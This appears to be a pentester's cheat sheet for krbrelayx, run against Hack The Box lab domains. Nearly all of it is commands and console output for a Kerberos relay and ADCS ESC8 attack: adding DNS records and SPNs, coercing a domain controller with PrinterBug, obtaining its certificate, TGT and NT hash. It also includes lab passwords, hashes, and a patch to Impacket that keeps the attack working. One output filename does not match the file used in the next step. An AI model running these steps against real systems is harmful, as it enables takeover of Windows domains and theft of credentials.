krbrelayx
GitHub - dirkjanm/krbrelayx: Kerberos relaying and unconstrained delegation abuse toolkit
KrbRelayX is a toolkit for relaying Kerberos authentication, written by security researcher @_dirkjan. It works around the limits that classic NTLM relay runs into when signing is enforced, channel binding is in place, or self-relay is blocked.
Related article: https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
Commonly used in unconstrained delegation attacks.
git clone https://github.com/dirkjanm/krbrelayx
# Add a DNS record
dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69
bloodyAD -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -k --host DC-01.darkcorp.htb add dnsRecord DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86 [--forest]
# Add an SPN (a second run with --additional may be needed)
addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl
# Coerce authentication
printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d 'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
# Start the listener
krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
Related commands
# Check name resolution
nslookup hack.delegate.vl dc1.delegate.vl
# Create a computer account
impacket-addcomputer 'delegate.vl/N.Thompson:KALEB_2341' -computer-name hack -computer-pass Admin123 -dc-ip 10.129.234.69
ESC8:
# Add a DNS record carrying the serialized SPN
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
# Kerberos relay listener
krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
# Trigger coerced authentication
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
# Get a TGT
certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
You may hit this error:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 90
Exception in thread Thread-5:
Traceback (most recent call last):
  File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner
    self.run()
    ~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
    ADCSAttack._run(self)
    ~~~~~~~~~~~~~~~^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
    certificate_store = self.generate_pfx(key, certificate)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
    obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
Newer pyOpenSSL releases no longer ship the crypto.PKCS12 class that Impacket's ADCS attack uses. Either run the tool with a pyOpenSSL version that still has it:
uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
Or patch generate_pfx in Impacket's adcsattack.py (crypto there is OpenSSL.crypto, already imported at the top of that file):
def generate_pfx(self, key, certificate):
    certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
    p12 = crypto.PKCS12()
    p12.set_certificate(certificate)
    p12.set_privatekey(key)
    return p12.export()
#========= change it to the following =================
def generate_pfx(self, key, certificate):
    from cryptography.hazmat.primitives import serialization
    from cryptography.hazmat.primitives.serialization import pkcs12
    # Convert the PEM certificate into a cryptography object
    cert_pem = certificate.encode() if isinstance(certificate, str) else certificate
    cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)
    cryptography_cert = cert_obj.to_cryptography()
    # Convert the pyOpenSSL private key into a cryptography object
    key_pem = crypto.dump_privatekey(crypto.FILETYPE_PEM, key)
    cryptography_key = serialization.load_pem_private_key(key_pem, password=None)
    # Build the PKCS#12 blob with cryptography instead of the removed crypto.PKCS12
    p12_data = pkcs12.serialize_key_and_certificates(
        name=b"",
        key=cryptography_key,
        cert=cryptography_cert,
        cas=None,
        encryption_algorithm=serialization.NoEncryption()
    )
    return p12_data
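The same PKCS#12 migration as a stand-alone example (added here; not the page's code and not Impacket's): it builds a throwaway RSA key and self-signed certificate as a constructed stand-in for the ADCS-issued pair, serializes them with cryptography's pkcs12 module and no pyOpenSSL at all, then parses the PFX back to confirm the key and certificate survived intact. The names make_test_identity, generate_pfx and pfx_roundtrip_ok are assumptions, not Impacket API.

```python
# Added example, not Impacket's code: a pyOpenSSL-free stand-in for generate_pfx
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import pkcs12
from cryptography.x509.oid import NameOID


def make_test_identity(common_name="pkcs12-test.example"):
    """Constructed stand-in for the ADCS-issued key/cert pair: a fresh RSA key
    and a one-day self-signed certificate. Returns (key, cert, cert_pem)."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])
    now = datetime.datetime.now(datetime.timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now)
        .not_valid_after(now + datetime.timedelta(days=1))
        .sign(key, hashes.SHA256())
    )
    return key, cert, cert.public_bytes(serialization.Encoding.PEM)


def generate_pfx(key, cert_pem):
    """PEM certificate + cryptography private key in, unencrypted PFX bytes out."""
    cert = x509.load_pem_x509_certificate(cert_pem)
    return pkcs12.serialize_key_and_certificates(
        name=b"", key=key, cert=cert, cas=None,
        encryption_algorithm=serialization.NoEncryption(),
    )


def pfx_roundtrip_ok(pfx_bytes, key, cert):
    """Parse the PFX back (no password) and check that the embedded key and
    certificate are exactly the ones that went in."""
    loaded_key, loaded_cert, extra = pkcs12.load_key_and_certificates(pfx_bytes, None)

    def der(k):  # canonical PKCS#8 DER form, so two key objects can be compared
        return k.private_bytes(serialization.Encoding.DER,
                               serialization.PrivateFormat.PKCS8,
                               serialization.NoEncryption())

    return loaded_cert == cert and der(loaded_key) == der(key) and not extra
```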
1. Example run
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB         DC-JPQ225.cicada.vl 445    DC-JPQ225        [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445    DC-JPQ225        VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445    DC-JPQ225        Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*]     SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*]     Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3